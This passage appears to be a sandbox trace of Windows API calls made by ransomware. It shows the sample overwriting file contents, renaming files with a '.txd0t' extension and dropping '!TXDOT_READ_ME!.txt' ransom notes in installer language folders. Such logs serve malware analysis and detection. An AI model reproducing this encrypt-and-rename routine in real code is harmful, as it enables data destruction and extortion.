(pszPath="\\\\?\\C:\\$GetCurrent\\SafeOS\\!TXDOT_READ_ME!.txt") returned 0 [0085.262] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\!TXDOT_READ_ME!.txt" (normalized: "c:\\$getcurrent\\safeos\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0085.263] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f734*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f730, lpOverlapped=0x0 | out: lpBuffer=0x4a9f734*, lpNumberOfBytesWritten=0x4a9f730*=0x2, lpOverlapped=0x0) returned 1 [0085.263] FlushFileBuffers (hFile=0x47c) returned 1 [0085.266] WriteFile (in: hFile=0x47c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f730, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f730*=0x7f0, lpOverlapped=0x0) returned 1 [0085.267] FlushFileBuffers (hFile=0x47c) returned 1 [0085.268] CloseHandle (hObject=0x47c) returned 1 [0085.268] GetProcessHeap () returned 0xe30000 [0085.268] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.268] CloseHandle (hObject=0x460) returned 1 [0085.269] MoveFileW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.txd0t" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.txd0t")) returned 1 [0085.269] SetEvent (hEvent=0x40c) returned 1 [0085.269] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.275] StrCpyW (in: psz1=0x4a9f760, psz2="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" [0085.275] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf.txd0t" [0085.276] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf.txd0t") returned 0 [0085.276] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.276] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0085.276] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=7567) returned 1 [0085.276] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.277] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.278] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe071, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.278] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x1d80, lpNumberOfBytesRead=0x4a9f720, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f720*=0x1d80, lpOverlapped=0x0) returned 1 [0085.279] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe280, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.279] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x4a9f724, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f724*=0x1d80, lpOverlapped=0x0) returned 1 [0085.279] FlushFileBuffers (hFile=0x460) returned 1 [0085.283] GetProcessHeap () returned 0xe30000 [0085.283] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.283] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" [0085.283] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf") returned="eula.rtf" [0085.283] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.283] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1025\\!TXDOT_READ_ME!.txt") returned 0 [0085.284] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1025\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0085.285] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f754*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x4a9f754*, lpNumberOfBytesWritten=0x4a9f750*=0x2, lpOverlapped=0x0) returned 1 [0085.286] FlushFileBuffers (hFile=0x464) returned 1 [0085.293] WriteFile (in: hFile=0x464, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f750*=0x7f0, lpOverlapped=0x0) returned 1 [0085.293] FlushFileBuffers (hFile=0x464) returned 1 [0085.294] CloseHandle (hObject=0x464) returned 1 [0085.295] GetProcessHeap () returned 0xe30000 [0085.295] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.295] CloseHandle (hObject=0x460) returned 1 [0085.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.txd0t")) returned 1 [0085.296] SetEvent (hEvent=0x40c) returned 1 [0085.296] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.299] StrCpyW (in: psz1=0x4a9f760, psz2="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" [0085.299] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf.txd0t" [0085.299] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf.txd0t") returned 0 [0085.299] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.299] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0085.300] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=6309) returned 1 [0085.300] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.300] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.301] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe55b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.302] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0x18a0, lpNumberOfBytesRead=0x4a9f720, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f720*=0x18a0, lpOverlapped=0x0) returned 1 [0085.302] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe760, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.302] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x18a0, lpNumberOfBytesWritten=0x4a9f724, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f724*=0x18a0, lpOverlapped=0x0) returned 1 [0085.302] FlushFileBuffers (hFile=0x460) returned 1 [0085.305] GetProcessHeap () returned 0xe30000 [0085.305] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.305] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" [0085.305] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf") returned="eula.rtf" [0085.305] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.305] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1028\\!TXDOT_READ_ME!.txt") returned 0 [0085.305] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1028\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0085.308] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f754*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x4a9f754*, lpNumberOfBytesWritten=0x4a9f750*=0x2, lpOverlapped=0x0) returned 1 [0085.308] FlushFileBuffers (hFile=0x464) returned 1 [0085.312] WriteFile (in: hFile=0x464, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f750*=0x7f0, lpOverlapped=0x0) returned 1 [0085.312] FlushFileBuffers (hFile=0x464) returned 1 [0085.314] CloseHandle (hObject=0x464) returned 1 [0085.314] GetProcessHeap () returned 0xe30000 [0085.314] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.314] CloseHandle (hObject=0x460) returned 1 [0085.314] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.txd0t")) returned 1 [0085.314] SetEvent (hEvent=0x40c) returned 1 [0085.314] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.317] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" [0085.317] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.txd0t" [0085.318] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.txd0t") returned 0 [0085.318] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.318] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0085.318] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=60816) returned 1 [0085.318] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.318] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.320] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff1070, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.320] ReadFile (in: hFile=0x460, lpBuffer=0x415b020, nNumberOfBytesToRead=0xed90, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0xed90, lpOverlapped=0x0) returned 1 [0085.322] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff1270, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.322] WriteFile (in: hFile=0x460, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xed90, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0xed90, lpOverlapped=0x0) returned 1 [0085.322] FlushFileBuffers (hFile=0x460) returned 1 [0085.476] GetProcessHeap () returned 0xe30000 [0085.476] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0085.476] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" [0085.476] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned="LocalizedData.xml" [0085.476] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.476] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1028\\!TXDOT_READ_ME!.txt") returned 1 [0085.477] GetProcessHeap () returned 0xe30000 [0085.477] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.477] CloseHandle (hObject=0x460) returned 1 [0085.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.txd0t")) returned 1 [0085.479] SetEvent (hEvent=0x40c) returned 1 [0085.479] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.489] StrCpyW (in: psz1=0x4a9f760, psz2="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" [0085.489] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf.txd0t" [0085.489] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf.txd0t") returned 0 [0085.489] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf", dwFileAttributes=0x80) returned 1 [0085.489] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0085.489] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=3419) returned 1 [0085.490] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.490] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.491] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffff0a5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.491] ReadFile (in: hFile=0x468, lpBuffer=0x415b020, nNumberOfBytesToRead=0xd50, lpNumberOfBytesRead=0x4a9f720, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f720*=0xd50, lpOverlapped=0x0) returned 1 [0085.491] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffff2b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.491] WriteFile (in: hFile=0x468, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x4a9f724, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f724*=0xd50, lpOverlapped=0x0) returned 1 [0085.492] FlushFileBuffers (hFile=0x468) returned 1 [0085.494] GetProcessHeap () returned 0xe30000 [0085.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0085.494] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" [0085.494] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf") returned="eula.rtf" [0085.494] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.494] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1031\\!TXDOT_READ_ME!.txt") returned 0 [0085.494] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1031\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0085.497] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f754*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x4a9f754*, lpNumberOfBytesWritten=0x4a9f750*=0x2, lpOverlapped=0x0) returned 1 [0085.497] FlushFileBuffers (hFile=0x464) returned 1 [0085.500] WriteFile (in: hFile=0x464, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f750*=0x7f0, lpOverlapped=0x0) returned 1 [0085.502] FlushFileBuffers (hFile=0x464) returned 1 [0085.509] CloseHandle (hObject=0x464) returned 1 [0085.509] GetProcessHeap () returned 0xe30000 [0085.509] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.509] CloseHandle (hObject=0x468) returned 1 [0085.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.txd0t")) returned 1 [0085.509] SetEvent (hEvent=0x40c) returned 1 [0085.509] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.514] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" [0085.514] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.txd0t" [0085.514] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.txd0t") returned 0 [0085.514] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.515] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0085.515] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=82346) returned 1 [0085.515] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.515] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0085.517] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffebc56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.517] ReadFile (in: hFile=0x468, lpBuffer=0x415b020, nNumberOfBytesToRead=0x141a0, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x141a0, lpOverlapped=0x0) returned 1 [0085.520] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffebe60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.520] WriteFile (in: hFile=0x468, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x141a0, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x141a0, lpOverlapped=0x0) returned 1 [0085.521] FlushFileBuffers (hFile=0x468) returned 1 [0085.532] GetProcessHeap () returned 0xe30000 [0085.532] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0085.532] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" [0085.532] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned="LocalizedData.xml" [0085.532] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0085.532] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1031\\!TXDOT_READ_ME!.txt") returned 1 [0085.532] GetProcessHeap () returned 0xe30000 [0085.532] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0085.532] CloseHandle (hObject=0x468) returned 1 [0085.532] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.txd0t")) returned 1 [0085.533] SetEvent (hEvent=0x40c) returned 1 [0085.533] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0085.537] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" [0085.537] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.txd0t" [0085.537] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.txd0t") returned 0 [0085.537] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0085.537] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0085.537] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=86284) returned 1 [0085.538] SetFilePointerEx (in: hFile=0x468, 